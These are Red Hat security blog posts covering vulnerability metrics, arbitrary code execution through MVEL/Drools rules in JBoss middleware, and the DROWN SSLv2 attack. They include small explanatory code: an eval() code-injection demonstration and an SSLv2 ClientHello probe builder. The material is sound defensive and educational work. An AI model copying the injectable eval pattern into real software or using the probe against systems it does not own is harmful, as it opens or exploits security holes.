    Every one of those 2000+ vulnerabilities is tracked in the Red Hat Bugzilla tool and is publicly accessible. Each vulnerability has a master bug including the CVE name as an alias and a “whiteboard” field which contains a comma separated list of metadata. The metadata we publish includes the dates we found out about the issue, the severity, and the source. We also summarise this in a file containing all of the information gathered for every CVE, as well as a readable entry in the CVE database in the Red Hat Customer Portal.

    For example, for CVE-2015-0297 mentioned above:

    Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2015-0297

    Whiteboard: impact=critical,public=20150414,reported=20150220,
    source=customer,cvss2=7.5/AV:N/AC:L/Au:N/C:P/I:P/A:P,
    cwe=CWE-306,jon-3/Security=affected

    This example shows us the issue was reported to Red Hat Product Security by a customer on February 20, 2015, the issue became known to the public on April 14, 2015, and it affected the JBoss Operations Network 3 product. An automated comment in the Bugzilla shows an errata was released to address this on April 21, 2015 as RHSA-2015:0862.
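    Since the whiteboard is a comma-separated list of key=value pairs, it is straightforward to consume programmatically; a minimal Python sketch, using the example string above:

```python
# Parse the comma-separated "whiteboard" metadata into a dict.
# Splitting on the first '=' only keeps values such as the CVSS
# vector (which contains ':' and '/') intact.
whiteboard = ("impact=critical,public=20150414,reported=20150220,"
              "source=customer,cvss2=7.5/AV:N/AC:L/Au:N/C:P/I:P/A:P,"
              "cwe=CWE-306,jon-3/Security=affected")

meta = dict(field.split("=", 1) for field in whiteboard.split(","))
print(meta["impact"])   # critical
print(meta["public"])   # 20150414
print(meta["source"])   # customer
```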

    Issues that are not yet public still get an entry in Bugzilla, but they are initially private to Red Hat. Once an issue becomes public, the associated Bugzilla is updated and made public.

    We make use of this data to create metrics and spot trends. One interesting metric is to look at how vulnerabilities are reported to us. We can do this by looking at the whiteboard “source” data to see how we found out about all the issues we fixed in 2015. This is shown on the chart below.

    Key:

    • Internet: for issues not disclosed in advance, we monitor a number of mailing lists and security web pages of upstream projects.
    • Relationship: issues reported to us by upstream projects, generally in advance of public disclosure.
    • Red Hat: issues found by Red Hat employees.
    • Individual: issues reported to Red Hat Product Security directly by a customer or researcher.
    • Peer vendors: issues reported to us by other open source distributions, through relationships or a shared private forum.
    • CVE: if we haven’t found out about an issue any other way, we can catch it from the list of public assigned CVE names from Mitre.
    • CERT: issues reported to us from a national Computer Emergency Response Team like CERT/CC or CPNI.

    We can make some observations from this data. First, Red Hat employees find a lot of the vulnerabilities we fix. We don’t take a passive role and wait for others to find flaws for us to fix; we actively look for issues ourselves, and these are found by engineering and quality assurance as well as our security teams. 12% of the issues we fixed in the year were found by Red Hat employees. The issues we find are shared back upstream and, if they are risky, disclosed under embargo to other peer vendors (generally via the ‘distros’ shared private forum). In addition to those 167 issues, Red Hat also finds and reports flaws in software that isn’t part of a current shipped product or that affects other vendors’ software.

    Next, relationships matter. When you are fixing vulnerabilities in third-party software, having a relationship with the upstream community makes a big difference. Red Hat Product Security are often asked how to get notified of issues in open source software in advance, but there is no single place you can go to get notifications. If an upstream is willing to give information about flaws in advance, then you should also be willing to give value back to that notification, making it a two-way street. At Red Hat we do this by sanity checking draft advisories, checking patches, and feeding back the results from our quality testing when there is enough time. A good example of this is the OpenSSL CCS Injection flaw in 2014. Our relationship with OpenSSL gave us advance notice of the issue. We found a mistake in the advisory as well as a mistake in the patch, which otherwise would have caused OpenSSL to have to do a secondary fix after release. Only two of the dozens of companies pre-notified about those OpenSSL vulnerabilities noticed issues and fed back information to upstream.

    Finally, it’s non-trivial to replicate this yourself. If you are an organization that uses open source software that you manage yourself, then you need to ensure you are able to find out about vulnerabilities that affect those components so you can analyse and remediate. Vendors without a sizable dedicated security team have to watch what other vendors do, or rely on other vulnerability feeds such as the list of assigned CVE names from Mitre. Red Hat chooses to invest in a dedicated team handling vulnerability notifications to ensure we find out about issues that affect our products and build upstream relationships.

    Embargo and release timings

    Vulnerabilities known to Red Hat in advance of being public are known as being “under embargo”, mirroring the way journalists use the term for stories under a press embargo which are not to be made public until an agreed date and time.

    The component parts that make up Red Hat products are open source, and this means we’re in most cases not the only vendor shipping each particular part. Unlike companies shipping proprietary software, Red Hat therefore is not in sole control of the date each flaw is made public. This is actually a good thing and leads to much shorter response times between flaws being first reported to being made public. It also keeps us honest; Red Hat can’t play games to artificially reduce our “days of risk” statistics by using tactics such as holding off public disclosure of meaningful flaws for a long period, or until some regularly scheduled patch day.

    Shorter embargo periods also make flaws much less valuable to attackers; they know a flaw in open source is likely to get fixed quickly, shortening their window of opportunity to exploit it.

    For the issues found by Red Hat, we choose to only embargo the issues that really matter and even then we use embargoes sparingly. Bringing in additional security experts, who would not normally be aware due to the embargo, rather than just the original researcher and the upstream project, increases the chances of the issue being properly understood and patched the first time around. For the majority of lower severity issues, attackers have little to no interest in them. By definition, these are issues that lead to minimal consequences even if they are exploitable, so the cost of embargoes is not justified. If we do choose to embargo an issue due to the severity, we share the details with the relevant upstream developers as well as other peer vendors, working together to address the issues. We talk about this more in our blog post "The hidden costs of embargos".

    For 2015, we knew about 438 (32%) of the vulnerabilities we addressed in advance of them being public. Across all products and vulnerabilities of all severities known to us in advance, the median embargo was 13 days.

    There are many positives to releasing fixes quickly for issues that matter, but the drawback of not having a regular patch day is that you need to respond to more issues as they happen. We do help suggest embargo dates that avoid weekends and major holidays, so let’s look at how well that works in practice.

    The chart above shows a heat-map for 2015 with the days and times we push most issues for Critical and Important advisories for all Red Hat products. The more advisories pushed for a given date and hour, the darker that section of the heat-map.

    The most popular times we pushed advisories were Tuesdays from 11 a.m. to 2 p.m. EST and Thursdays from 9 a.m. to 3 p.m. EST. Fridays are pretty light for pushes, and there were no Saturday pushes. The only Sunday pushes were ones arranged to arrive first thing Monday morning (these are usually pushed during Monday in India or Europe time zones).

    Conclusion

    This report looked at the security risk to users of Red Hat products in 2015 by giving metrics around vulnerabilities, highlighting the most severe issues, examining which were exploited, and showing which were branded or gained media attention.

    There are other types of security risks, such as malware or ransomware, that we haven’t covered in this report. Such attacks generally rely on an attacker first gaining access to a system through an intrusion or by exploiting a vulnerability.

    For the last year of vulnerabilities affecting Red Hat products the issues that matter and the issues that got branded do have an overlap, but they certainly don’t closely match. Just because an issue gets given a name, a logo, or press attention does not mean it’s of increased risk. We’ve also shown there were some vulnerabilities of increased risk that did not get branded or media attention at all.

    At Red Hat, our dedicated Product Security team analyses threats and vulnerabilities against all of our products every day, and provides relevant advice and updates through the Red Hat Customer Portal. Customers can call on this expertise to ensure that they respond quickly to address the issues that matter, while avoiding being caught up in a media whirlwind over those that don’t.

    Appendix: Common security abbreviations and terms

    Acronyms are used extensively in security standards, so here are some of the more common terms and abbreviations you’ll see used by Red Hat relating to vulnerability handling and errata. You can find more in this blog post.

    CVE:

    The Common Vulnerabilities and Exposures (CVE) project is a list of standardized names for vulnerabilities and security exposures.

    Since November 2001 Red Hat has used CVE names in security advisories to describe all vulnerabilities affecting Red Hat products. Red Hat has CVE Editorial Board membership and is a Candidate Naming Authority. We have a public CVE compatibility page and provide a CVE database in the Red Hat Customer Portal.

    CVRF:

    The goal of the Common Vulnerability Reporting Framework (CVRF) is to provide a way to share information about security updates in an XML machine-readable format.

    Since 2012, Red Hat has provided CVRF representations of Red Hat Security Advisories; details can be found on this page.

    OVAL:

    The Open Vulnerability and Assessment Language (OVAL) project promotes open and publicly available security content, and seeks to standardize the transfer of this information across the entire spectrum of security tools and services.

    Since 2006, Red Hat has been providing machine-readable XML versions of our Red Hat Enterprise Linux security advisories as OVAL definitions. Our OVAL definitions are designed for use by automated test tools to determine the patch state of a machine.

    Red Hat provides OVAL patch definitions for security updates to Red Hat Enterprise Linux 4, 5, 6, and 7. The first OVAL-compatible version was Red Hat Enterprise Linux 3, for which OVAL patch definitions continue to be available for download. For more information read this page.

    RHSA:

    Since 1999, all Red Hat security updates have been accompanied by a security advisory (RHSA). The advisories are publicly available via the Red Hat Customer Portal as well as through other notification methods such as email. These are sometimes also referred to as security errata. The other advisory types are the Red Hat Bugfix Advisory (RHBA) and the Red Hat Enhancement Advisory (RHEA).

    CVSS:

    Common Vulnerability Scoring System (CVSS) base scores give a detailed severity rating by scoring the constant aspects of a vulnerability: Access Vector, Access Complexity, Authentication, Confidentiality, Integrity, and Availability.

    Since 2009, Red Hat provides CVSS version 2 base metrics for all vulnerabilities affecting Red Hat products. These scores are found on the CVE pages (linked to from the References section of each Red Hat Security Advisory) and also from our Security Measurements page.

    CVSS scores are not used by Red Hat to determine the priority with which flaws are fixed. They serve as a guideline to identify key metrics of a flaw, but the priority with which flaws are fixed is determined by the overall impact of the flaw, using the aforementioned 4-point scale.
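    A published CVSS v2 score-and-vector string (such as the one in the whiteboard metadata shown earlier) can be split into its base score and named metrics; a minimal sketch:

```python
# Split a CVSS v2 "score/vector" string into the base score and a
# dict of base metrics (AV, AC, Au, C, I, A).
cvss2 = "7.5/AV:N/AC:L/Au:N/C:P/I:P/A:P"

score, *parts = cvss2.split("/")
metrics = dict(p.split(":") for p in parts)

print(float(score))    # 7.5
print(metrics["AV"])   # N  (Access Vector: Network)
print(metrics["C"])    # P  (Confidentiality impact: Partial)
```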

    CWE:

    Common Weakness Enumeration (CWE) is a dictionary or formal list of common software weaknesses. It is a common language or taxonomy for describing vulnerabilities and weaknesses; a standard measurement for software assurance tools and services’ capabilities; and a base for software vulnerability and weakness identification, mitigation, and prevention.
    The Red Hat Customer Portal is officially CWE Compatible.

    CPE:

    CPE is a structured naming scheme for information technology systems, software, and packages. For reference, we provide a dictionary mapping the CPE names we use to Red Hat product descriptions. Some of these CPE names will be for new products that are not yet in the official CPE dictionary, and should therefore be treated as temporary CPE names.
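    A CPE 2.2 URI encodes its fields positionally, so a name can be decomposed with a simple split; a sketch, using a CPE name of the form used for Red Hat Enterprise Linux as the example:

```python
def parse_cpe(name):
    # CPE 2.2 URI form: cpe:/{part}:{vendor}:{product}:{version}...
    # where part is 'o' (OS), 'a' (application), or 'h' (hardware).
    fields = name.split(":")
    keys = ("vendor", "product", "version", "update", "edition")
    return {"part": fields[1].lstrip("/"), **dict(zip(keys, fields[2:]))}

print(parse_cpe("cpe:/o:redhat:enterprise_linux:7"))
# {'part': 'o', 'vendor': 'redhat', 'product': 'enterprise_linux', 'version': '7'}
```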

    Posted: 2016-04-20T13:30:00+00:00
  • Security risks with higher level languages in middleware products

    Authored by: Pavel Polischouk

    Java-based high-level application-specific languages provide significant flexibility when using middleware products such as BRMS. This flexibility comes at a price, as there are significant security concerns in their use. In this article, the usage of the Drools language and MVEL in JBoss BRMS is examined to demonstrate some of these concerns. Other middleware products may be exposed to similar risks.

    Java is an extremely feature-rich portable language that is used to build a great range of software products, from desktop GUI applications to smartphone apps to dedicated UIs for hardware such as printers to a breadth of server-side products, mostly middleware. As such, Java is a general-purpose language with a rather steep learning curve and strict syntax, well suited for complex software projects but not very friendly for writing simple scripts and one-liner pieces of code.

    Several efforts have emerged over time to introduce Java-based or Java-like scripting functionality, probably the most famous being JavaScript: a language that is not based on Java but appears similar to it in several aspects, and is well suited for scripting.

    Another example of a simplified language based on Java is MVEL. MVEL is an expression language, mostly used for making basic logic available in application-specific languages and configuration files, such as XML. It is not intended for serious object-oriented programming, but mainly for simple expressions such as "user.getManager().getName() != null". However simple, MVEL is still very powerful and allows the use of any Java APIs available to the developer; its strength is its simplified syntax, which does not restrict the ability to call any code the developer may need access to.
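    That double-edged property can be illustrated with an analogous Python sketch: an expression evaluator embedded via eval() happily handles "simple" field checks, but the same entry point also accepts arbitrary code. The User class and expressions here are invented for illustration; the same pattern applies to MVEL.

```python
# Illustrative analogue of an embedded expression language.
class User:
    def __init__(self, manager=None):
        self.manager = manager

# The intended use: short, declarative checks over domain objects.
expr = "user.manager is not None"
print(eval(expr, {"user": User(manager=User())}))  # True

# The unintended consequence: the same evaluator runs arbitrary code,
# reaching anything importable, just as MVEL can reach any Java API.
dangerous = "__import__('os').getpid()"
print(eval(dangerous, {"user": User()}))  # arbitrary call executes
```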

    Yet another example of a Java-based application-specific language is the Drools rules language. It is used in JBoss BRMS, a middleware product that implements Business Rules, and its open source counterpart Drools. There is a similar idea behind the Drools language: to hide all the clutter of Java from the rules developer and provide a framework that makes it easy to concentrate on the task at hand (namely: writing business rules) without compromising the ability to call any custom Java code that might be needed to properly implement the organisation's business logic.

    Developers of Java middleware products, starting with application servers and continuing to more complex application frameworks, traditionally invest a great deal of effort into making their products secure. This includes: separating the product’s functionality into several areas with different levels of risk; applying user roles to each of these areas; authorization and authentication of users; audit of the available functionality to evaluate the risk of using this functionality for unintended tasks that could potentially lead to compromises, etc. In this context it is important to understand that the same rich feature set and versatility that makes Java so attractive as a developer platform also becomes its Achilles heel when it comes to security: every so often one of these features finds its way into some method of unintended use or another.

    In this article I will look at one such case where a very flexible feature was added to one of the middleware products that was later discovered to include unsafe consequences, and the methods used to patch it.

    JBoss BRMS, mentioned above, had a role-based security model from the very beginning. Certain roles would allow deployment of new rules and certain development processes would normally be established to allow proper code review prior to deployment. These combined together would ensure that only safe code is ever deployed on the server.

    This changed in BRMS (and BPMS) 6. A new WYSIWYG tool was introduced that allowed rules to be constructed graphically in a browser session and tested right away, so any person with rule-authoring permissions (the role known as "analyst" rather than "admin") could do this. Drools rules allow arbitrary MVEL expressions, which in turn allow calls to any Java classes deployed on the application server, including the system ones, without restriction. As an example, an analyst could write System.exit() in a rule, and testing this rule would shut down the server. In effect, the graphical rule editor allowed authenticated arbitrary code execution for non-admin users.

    A similar problem existed in JBoss Fuse Service Works 6. While the Drools engine that ships with it does not come with any graphical tool to author rules, so the rules must be deployed on the server as before, it comes with the RTGov component that has some MVEL interfaces exposed. Sending an RTGov request with an MVEL expression in it would again allow authenticated arbitrary code execution for any user that has RTGov permissions.

    This behaviour was caught early on in the development cycle for BxMS/FSW version 6, and a fix was implemented. The fix involves running the application server with Java Security Manager (JSM) turned on, and enabling specific security policies for user-provided code. After the fix was applied, only a limited number of Java instructions were allowed to be used inside user-provided expressions, which were safe for use in legitimate Drools rules and RTGov interfaces, and the specific RCE (Remote Code Execution) vulnerability was considered solved. Essentially a similar security approach was taken as for running Java applets in a sandbox within a browser, where an applet can only use a safe subset of the Java library.
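    The shape of such a restriction can be sketched as a hypothetical Java Security Manager policy fragment (the codeBase path and granted permission are invented for illustration): user-provided rule code receives only a narrow allow-list, with no exitVM, file, or process-execution permissions.

```
// Hypothetical JSM policy fragment for user-provided rule code.
// Anything not granted here -- RuntimePermission "exitVM",
// FilePermission, exec, and so on -- is denied.
grant codeBase "file:${jboss.home.dir}/rules/-" {
    permission java.util.PropertyPermission "user.timezone", "read";
};
```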

    Some side effects were detected when the products went into testing with the fix applied and performance regression testing was executed. It was discovered that certain tests ran significantly slower with JSM enabled than on an unsecured machine. This slowdown was significant only in tests that measured the raw performance of rules rather than “real-world” scenarios, since any kind of database access would slow overall performance far more than enabling the JSM. However, certain guidelines were developed to help customers achieve the best possible balance of speed and security.

    When deploying BRMS/BPMS on a high-performance production server, it is possible to disable JSM, provided that no "analyst"-role users are allowed to use these systems for rule development. It is recommended to use these servers for running rules and applications developed separately, achieving maximum performance while eliminating the vulnerability by disallowing rule development altogether, which removes the whole attack vector.

    When BRMS is deployed on development servers used by rule developers and analysts, it is suggested to run these servers with JSM enabled. Since these are not production servers, they do not require mission critical performance in processing real-time customer data, as they are only used for application and rule development. As such, the overhead of the JSM is not noticeable on a non mission-critical server and it is a fair trade-off for a tighter security model.

    When a server is deployed in a "BRMS-as-a-service" configuration, or in other words when rule development is exposed to customers over the Web (even through a VPN-protected Extranet), enabling the complete JSM protection is the recommended approach, accepting the JSM overhead. Without it, any customer with minimal "rule writing and testing" privileges could completely take over the server (and any other co-hosted customers' data as well), a highly undesirable situation.

    Similar solutions are recommended for FSW. Since only RTGov exposes the weakness, it is recommended to run RTGov as a separate server with JSM enabled. For high-performance production servers, it is recommended not to install or enable the RTGov component, which eliminates the user-provided-code attack vector and makes it possible to run those servers without JSM at full speed.

    This kind of concern is not specific to JBoss products but is a generic problem potentially affecting any middleware system. Any time rich functionality is made available to users, some of it may be used for malicious purposes. Red Hat takes the security of its customers very seriously, and every effort is made not only to provide customers with the richest functionality, but also to make sure this functionality is safe to use and that proper safe-usage guidelines are available.

    Posted: 2016-03-23T13:30:00+00:00
  • Go home SSLv2, you’re DROWNing

    Authored by: Mark J. Cox

    The SSLv2 protocol had its 21st birthday last month, but it’s no cause to celebrate with an alcoholic beverage, since the protocol was already deprecated when it turned 18.

    Announced today is an attack called DROWN that takes advantage of systems still using SSLv2.

    Many cryptographic libraries already disable SSLv2 by default, and updates from the OpenSSL project and Red Hat today catch up.

    What is DROWN?

    CVE-2016-0800, also known as DROWN, stands for Decrypting RSA with Obsolete and Weakened eNcryption, and is a Man-in-the-Middle (MITM) attack against servers running TLS for secure communications.

    This means that if an attacker can intercept and modify network traffic between a client and the host, the attacker could impersonate the server on what is expected to be a secure connection. The attacker could then potentially eavesdrop or modify important information as it is transferred between the server and client.

    Other Man-in-the-Middle attacks have included POODLE and FREAK. The famous OpenSSL Heartbleed issue from April 2014 did not need a Man-in-the-Middle and was therefore a much more severe risk.

    How does it work?

    The DROWN issue is technically complicated, and the ability to attack using it depends on a number of factors described in more detail in the researchers’ whitepaper. In short, the attack abuses a protocol flaw in SSLv2 as an oracle to help break the encryption of other TLS services when a shared RSA key is in use. The attack is quite tricky to exploit by itself, but is made much easier against servers that have not applied certain year-old OpenSSL security updates. The researchers call this variant “Special DROWN”, as it could allow a real-time Man-in-the-Middle attack.
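    For the curious, the SSLv2 handshake that the oracle relies on begins with a ClientHello whose wire format is simple enough to write down. The sketch below is a toy illustration based on the public SSLv2 draft specification, not code from the DROWN paper: it only builds the message, and the RC4-with-MD5 cipher kind is just one example value. A scanner would send these bytes to a server and treat any ServerHello reply as evidence that SSLv2 is still enabled.

    ```python
    import os
    import struct

    # SSLv2 ClientHello layout (per the SSLv2 draft specification):
    #   2-byte record header (high bit set, 15-bit length), then
    #   msg-type(1) version(2) cipher-specs-len(2) session-id-len(2)
    #   challenge-len(2) cipher-specs session-id challenge
    SSL2_MT_CLIENT_HELLO = 0x01
    SSL2_VERSION = 0x0002
    # SSL_CK_RC4_128_WITH_MD5; DROWN specifically abuses export-grade kinds
    CIPHER_KINDS = b"\x01\x00\x80"

    def sslv2_client_hello(challenge=None):
        """Build the raw bytes of an SSLv2 ClientHello message."""
        challenge = challenge or os.urandom(16)
        body = struct.pack(
            ">BHHHH",
            SSL2_MT_CLIENT_HELLO,
            SSL2_VERSION,
            len(CIPHER_KINDS),   # cipher-specs length
            0,                   # no session id
            len(challenge),
        ) + CIPHER_KINDS + challenge
        # two-byte record header: high bit set, low 15 bits are the body length
        header = struct.pack(">H", 0x8000 | len(body))
        return header + body

    hello = sslv2_client_hello()
    assert hello[0] & 0x80                    # record-header flag is set
    assert hello[2] == SSL2_MT_CLIENT_HELLO   # message type byte
    ```

    The oracle itself lies deeper in the protocol (the server's handling of the RSA-encrypted master-key message), but even this opening message shows how different SSLv2 framing is from TLS records.
    
    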

    Red Hat has a vulnerability article in the Customer Portal which explains the technical attack and the dependencies in more detail.

    How is Red Hat affected?

    OpenSSL is affected by this issue. In Red Hat Enterprise Linux, the cryptographic libraries GnuTLS and NSS are not affected by this issue as they intentionally do not enable SSLv2.

    Customers who are running services that have the SSLv2 protocol enabled could be affected by this issue.

    Red Hat has rated this issue as having Important security severity. A successful attack would need to leverage a number of conditions and would require the attacker to be a Man-in-the-Middle.

    Red Hat advises that SSLv2 is a protocol that should no longer be considered safe and should not be used in a modern environment. Red Hat updates for OpenSSL can be found here: https://access.redhat.com/security/cve/cve-2016-0800. The updates cause the SSLv2 protocol to be disabled by default.
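    Beyond applying the OpenSSL updates, it is worth confirming that SSLv2 is explicitly disabled in every service that terminates TLS. As one hedged example, using the directive documented for Apache httpd's mod_ssl (the equivalent nginx directive is `ssl_protocols`):

    ```
    # Apache httpd (mod_ssl): allow all protocols except SSLv2 and SSLv3
    SSLProtocol all -SSLv2 -SSLv3
    ```

    A quick external check is `openssl s_client -connect host:443 -ssl2`; note that the `-ssl2` option only exists in OpenSSL builds compiled with SSLv2 support, so an unrecognized-option error from a patched client is itself a good sign.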

    Our OpenSSL updates also include several other lower priority security fixes which are each described in the Errata. Your organization should review those issues as well when assessing risk.

    If you are a Red Hat Insights customer, a test has been added to identify servers affected by this issue.

    What do you need to do?

    If you are unsure of any details surrounding this issue in your environment, you should apply the update and restart services as appropriate. For detailed technical information please see the Red Hat vulnerability article.

    Security protocols don’t turn 21 every day, so let’s turn off SSLv2, raise a glass, and DROWN our sorrows. Cheers!

    Posted: 2016-03-01T13:00:00+00:00